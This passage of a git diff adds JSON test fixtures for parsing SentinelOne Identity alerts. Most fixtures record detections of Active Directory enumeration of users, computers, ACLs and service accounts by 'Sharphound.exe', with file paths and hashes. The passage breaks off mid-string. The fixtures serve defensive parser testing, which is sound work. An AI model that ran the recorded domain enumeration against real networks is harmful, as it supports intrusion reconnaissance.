"Identity", + "reason": "This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-eb28-7a57-9c27-87843b2cec61", + "name": "AD Service Account Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json new file mode 100644 index 000000000..a31ef954f --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_13.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", 
+ "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-c715-72c9-bbd9-dc1ff6a7ff1e", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json new file mode 100644 index 000000000..7b9fc10e1 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_14.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + 
"reason": "This event is generated when a command used to query or read the ACL's\\ Permission of any object in Active Directory.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-cb9b-770e-96ee-632d4d21520b", + "name": "AD ACL Enumeration", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json new file mode 100644 index 000000000..d8a7c1f8a --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_15.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": 
"Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d4ba-7131-9e08-defa8b3aeb52", + "name": "Domain Users Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json new file mode 100644 index 000000000..8a5217a55 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_16.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", 
+ "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-dc47-75de-8925-5f026bd5a705", + "name": "LDAP Search Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json new file mode 100644 index 000000000..6d697a5be --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_2.json 
@@ -0,0 +1,22 @@ +{ + "input": { + "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n 
\"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n 
\"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": 
[],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 
200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": 
\"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}" + }, + "expected": { + "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n 
},\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": 